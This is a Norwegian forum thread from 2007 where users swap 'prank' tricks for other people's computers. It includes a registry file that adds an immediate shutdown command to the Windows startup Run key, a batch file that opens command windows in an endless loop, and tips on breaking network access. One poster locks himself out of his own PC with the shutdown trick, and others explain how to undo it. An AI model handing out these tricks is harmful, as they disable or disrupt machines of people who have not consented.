S.M. Skrevet 27. mars 2007 Del Skrevet 27. mars 2007 Fikse på internettet så den kjører lan proxy slik at tilkoblingene misslykkes. Kjøre adblock med litt for mye blokkeringer Lenke til kommentar
krigsnaut Skrevet 27. mars 2007 Del Skrevet 27. mars 2007 kjøre en addblock some blockerer alt som inneholder php eller html i navnet sitt. Lenke til kommentar
dymoletratag Skrevet 27. mars 2007 Del Skrevet 27. mars 2007 Nope, funker ikke... Funker ikke shutdown i cmd også? Lenke til kommentar
krigsnaut Skrevet 27. mars 2007 Del Skrevet 27. mars 2007 min unpene feil. her er det du skal skrive i .reg fila. Bytt ut "ondskapsfulltnavnher" med navnet du vil ha OG BEHOLD HERMETEGNENE. Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] "ondskapsfulltnavnher"="shutdown -s -t 00" Lenke til kommentar
dymoletratag Skrevet 27. mars 2007 Del Skrevet 27. mars 2007 (endret) Funker fortsatt ikke... får bare spørsmål om jeg er sikker på om jeg vil legge den inn i registeret, trykker jeg JA får jeg en bekreftelse på at den er lagt inn i registeret, også skjer det ikke no.. Edit: Får vel legge inn en prank jeg å da Denna er ganske simpel, men den funker Lag en .BAT fil, og skriv følgende: :loop start cmd goto loop Egentlig kan du skrive hva du vil istedet for "loop", bare det står det samme på "goto" Endret 27. mars 2007 av Fev4ng Lenke til kommentar
S.M. Skrevet 27. mars 2007 Del Skrevet 27. mars 2007 Funker fortsatt ikke... får bare spørsmål om jeg er sikker på om jeg vil legge den inn i registeret, trykker jeg JA får jeg en bekreftelse på at den er lagt inn i registeret, også skjer det ikke no.. Edit: Får vel legge inn en prank jeg å da Denna er ganske simpel, men den funker Lag en .BAT fil, og skriv følgende: :loop start cmd goto loop Egentlig kan du skrive hva du vil istedet for "loop", bare det står det samme på "goto" 8248805[/snapback] Denne fila har da lagt til registerendringer som sier at ved oppstart skal denne maskinen skru seg av. Start maskinen på nytt så ser du detta . shutdown -s skriv dette i cmd så ser du at den skrus av En annen prank er å starte feks. Spider.exe i batch skript som du kopiere 50 ganger i skripta slik at en må lukke programmet 50x før den endelig forsvinner.. Lenke til kommentar
krigsnaut Skrevet 27. mars 2007 Del Skrevet 27. mars 2007 bytt til en *liten* stavefeil på www.hotmail.com Lenke til kommentar
-H- Skrevet 27. mars 2007 Del Skrevet 27. mars 2007 som f.eks. å bytte ut i'en med en L, og l'en med en E? Lenke til kommentar
dymoletratag Skrevet 27. mars 2007 Del Skrevet 27. mars 2007 Eller manboobs.co.uk :!: Lenke til kommentar
krigsnaut Skrevet 27. mars 2007 Del Skrevet 27. mars 2007 som f.eks. å bytte ut i'en med en L, og l'en med en E? 8249729[/snapback] da vet man nokk om hva navnet ditt står for... (bare tuller ) Lenke til kommentar
dymoletratag Skrevet 27. mars 2007 Del Skrevet 27. mars 2007 Alreit, nå har jeg vært dum nok til å prøve shutdown-opplegget på min egen pc, og har brukt de siste 2,5 timene på å skru den på siden den hele tiden skrur seg av ved oppstart. Noen tips til hvordan jeg kan fikse dette? Lenke til kommentar
Emancipate Skrevet 27. mars 2007 Del Skrevet 27. mars 2007 Hehe, "Funker fortsatt ikke..." du liksom! Hvis jeg avslører hvordan du skal stoppe det her er jo hele vitsen borte. Men jeg har et spesialtilbud: Kun kr. 500 + omkostninger og jeg skal fortelle deg det... Lenke til kommentar
dymoletratag Skrevet 27. mars 2007 Del Skrevet 27. mars 2007 Hehe, "Funker fortsatt ikke..." du liksom! Hvis jeg avslører hvordan du skal stoppe det her er jo hele vitsen borte. Men jeg har et spesialtilbud: Kun kr. 500 + omkostninger og jeg skal fortelle deg det... 8252534[/snapback] Nei takk, hvis dette var et seriøst tilbud takker jeg nei og venter på et gratis svar i stedet Hvis det var ironisk ment, var det i så fall utrolig dårlig. Lenke til kommentar
Emancipate Skrevet 27. mars 2007 Del Skrevet 27. mars 2007 Hørte jeg at du takket ja? (Prisen har forresten gått opp i mellomtiden...) Ok, start i sikkermodus. Så åpner du regedit og fjerner driten. Lenke til kommentar
-Eriksen Skrevet 27. mars 2007 Del Skrevet 27. mars 2007 Alreit, nå har jeg vært dum nok til å prøve shutdown-opplegget på min egen pc, og har brukt de siste 2,5 timene på å skru den på siden den hele tiden skrur seg av ved oppstart. Noen tips til hvordan jeg kan fikse dette? 8252229[/snapback] Lenke til kommentar
dymoletratag Skrevet 27. mars 2007 Del Skrevet 27. mars 2007 Greit greit, fryktelig morsomt " :!: " Lenke til kommentar
-H- Skrevet 27. mars 2007 Del Skrevet 27. mars 2007 da vet man nokk om hva navnet ditt står for... (bare tuller ) ikke morsomt.. Lenke til kommentar
Håvard Skrevet 27. mars 2007 Del Skrevet 27. mars 2007 Nope, funker ikke... Funker ikke shutdown i cmd også? 8248608[/snapback] Josh... Start - Kjør - CMD Skriv: Shutdown -s -t 60 -c "Nå slår den seg av" Lenke til kommentar
S.M. Skrevet 28. mars 2007 Del Skrevet 28. mars 2007 shutdown -a i cmd, men jeg regner med du ikke er sÅ rask Lenke til kommentar
Anbefalte innlegg
Opprett en konto eller logg inn for å kommentere
Du må være et medlem for å kunne skrive en kommentar
Opprett konto
Det er enkelt å melde seg inn for å starte en ny konto!
Start en kontoLogg inn
Har du allerede en konto? Logg inn her.
Logg inn nå